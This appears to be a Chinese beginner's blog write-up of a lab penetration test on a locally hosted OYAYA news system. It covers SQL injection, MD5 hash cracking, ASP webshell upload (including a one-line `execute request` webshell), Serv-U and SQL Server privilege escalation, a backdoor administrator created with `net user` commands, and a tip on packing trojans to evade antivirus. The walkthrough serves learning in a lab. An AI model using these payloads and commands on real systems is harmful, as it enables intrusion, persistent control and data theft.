菜鸟折腾前人的web攻击之路

Web攻击OYAYA新闻管理系统

1.环境配置

Win server2003服务器配置，其中集成了ISS管理器，Oyaya新闻管理系统，Serv-u等实验配置环境，还安装了攻击工具，例如啊D注入工具，中国菜刀，实现Web攻击。

2.操作流程

1.扫描目标网站192.168.227.131即安装在本机的oyaya新闻管理系统，寻找注入点

 

图1 扫描注入点

2.从图中可以发现找出1个注入点，双击可用注入点进入sql注入检测，从而查询表中的内容，找出关键字段的值，从而获取网站后台网址及管理员用户名和密码（已加密）。

 

图2 sql注入检测，找出密码的hash值

3.这里找出hash值后我就可以开始暴力破解，但有时一些hash解密比较慢，一时半会无法破解，可以尝试绕过管理员登录界面，直接进入后台，现在许多网站仍存在cookie验证漏洞，可以尝试绕过去。由于我是初学者，暂时还没有掌握绕过方法，暂时通过网站暴力破解解密出找出的hash值。

找出hash值：

[admin] : admin

[password] : 4f423c383611d687315cc2b6ca790d25

[admin] : oyaya

[password] : 4f423c383611d687315cc2b6ca790d25

先通过kali linux中hash-indentifier确认hash值的加密类型

 

图3 确认加密类型

确认加密类型为MD5后，通过上网查找解密后：

您查询的字符串是“4f423c383611d687315cc2b6ca790d25”,解密结果为：“www.oyaya.net”!

4.我现在已经拿到管理员帐号和密码，开始准备获取webshell。先通过管理入口查询找出网站目录，先上传小马。

 

图4 检测出的管理入口

5.读取c盘目录

 

图5 读取c盘目录

6.先登录后台看有没有可以利用的后台

 

图6.1 登录后台管理系统

 

图6.2 后台管理系统

未找到可利用的后台数据库备份，开始尝试上传小马

7.方法一：

使用啊D中cmd/上传功能找出oyaya数据库位置，上传小马

 

图7 上传小马

8.通过小马链接上传大马

 

图8 上传大马

9.链接之大马，查看大马源文件得知密码为asd，登录进去，拿下webshell

 

图9 登录大马，拿下webshell

注意：这个上传小马或者是大马的这个过程也会出现一些意外情况，比如服务器端安装了杀毒软件，直接将小马或大马删除了，这个时候我们可以对准备上传的木马文件进行一些加壳操作，使得它能够免杀。

10.获取系统管理员权限

通过Server-U本地提权漏洞获取操作系统的管理员权限，利用大马中提供的server-U提权代码获取管理员权限：

 

图10.1 通过大马提权

 

图10.2 提权完成

11.方法二：

在上传小马那一步改为上传轻便不易查杀的一句话木马，口令为ckf

<%execute request("ckf")%>

 

图11 上传一句话木马

 

12.通过拿站比较方便的中国菜刀用口令进入数据库，上传大马

注：地址栏为链接的一句话木马，后一栏为口令ckf

 

图12 用中国菜刀链接一句话木马

13.其实这是已经可以操控整个网站，为了方便，上传大马拿下Webshell

 

图13 上传大马

14.链接是大马拿下webshell，提权同上

 

图14.1 登录大马，拿下webshell

 

图14.2 拿下webshell

15.提权问题

以上提权方法只适用于Serv-u6.0以前，由于之后的用户的路径发生改变，上述方法不适用，所以总结了下列的方法。

16.Serv-u15.0提权的方法试验

16.1.通过浏览Serv-u的安装目录找出目前版本的用户文件保存的路径，在user目录下，通过查阅本机的oyaya.Archive文件找出Serv-u的用户名和密码。

 

图16.1 得知服务器的用户名和密码

16.2通过登录Serv-u，使用设置的端口8088查看获知的用户的权限，发现只是个普通用户，看样子我还需要自己创个系统管理员。

 

图16.2.1 登录界面

 

图16.2.2 登录到Web客户端

16.3用自己本机上的serv-u自己创个系统管理员test，再把test用户的信息通过大马上传到服务器中，用新创的test用户登录。

 

图16.3.1 自己创的管理员用户test

 

图16.3.2 用test登录

 

图16.3.3 登录到Serv-u管理界面

16.4尝试登录到ftp中新创建一个系统管理员员

 

图16.4 通过Serv-u提权失败

登录到ftp，新建系统用户并没有权限，尝试通过Serv-u提权失败。接下来换个思路，尝试通过SQL Server提权。

17.SQL Server提权

17.1通过大马搜索网站目录下的敏感信息，例如conn.asp文件

 

图17.1 搜索网站的敏感文件

17.2下载下来查看源码，找出服务器名称，数据库名称，数据库的用户名和密码。一般如果没有经过降权处理的话，找到数据库用户的权限为system权限。

 

图17.2 找出数据库相关信息

17.3通过大马上自带的执行sqlcmd命令功能，添加用户hack，密码为hack，添加到系统管理员用户组中。执行下列命令：

net user hack hack /add

net localgroup administrators hack /add

 

图17.3.1 添加用户hack

 

图17.3.2 把用户hack加到管理员组中，获得管理员权限

17.4此时已经成功提权。扫描端口发现3389端口开放，可以通过物理机远程登录服务器，并用刚才创建的系统管理员hack登录进去，成功拿下网站。

 

图17.4.1 远程登录服务器

 

图17.4.2 利用新建的系统管理员hack登录

 

图17.4.3 成功登录进入服务器

18.自此，成功拿下一个简单的oyaya新闻管理系统的网站，了解了渗透攻击网站的流程，熟悉了一些攻击方法和攻击工具。

3.总结

本次实验主要学习了网站服务器渗透测试的基本流程，由于是初学者，所以使用了工具进行攻击，不过也基本熟悉了一些攻击方式，接下来需要深入了解攻击原理和学会自己编写脚本进行攻击。黑客的技术要与时俱进，随着人们安全意识的提升，可能攻击需要另辟蹊径，在技术层面要学习新的安全知识和防御这些攻击，在社工方面黑客往往抓住人性的弱点，我也必须提高自己的安全知识。

嗯，图片由于限制没传上去，给自己勉励自己曾经折腾过经历！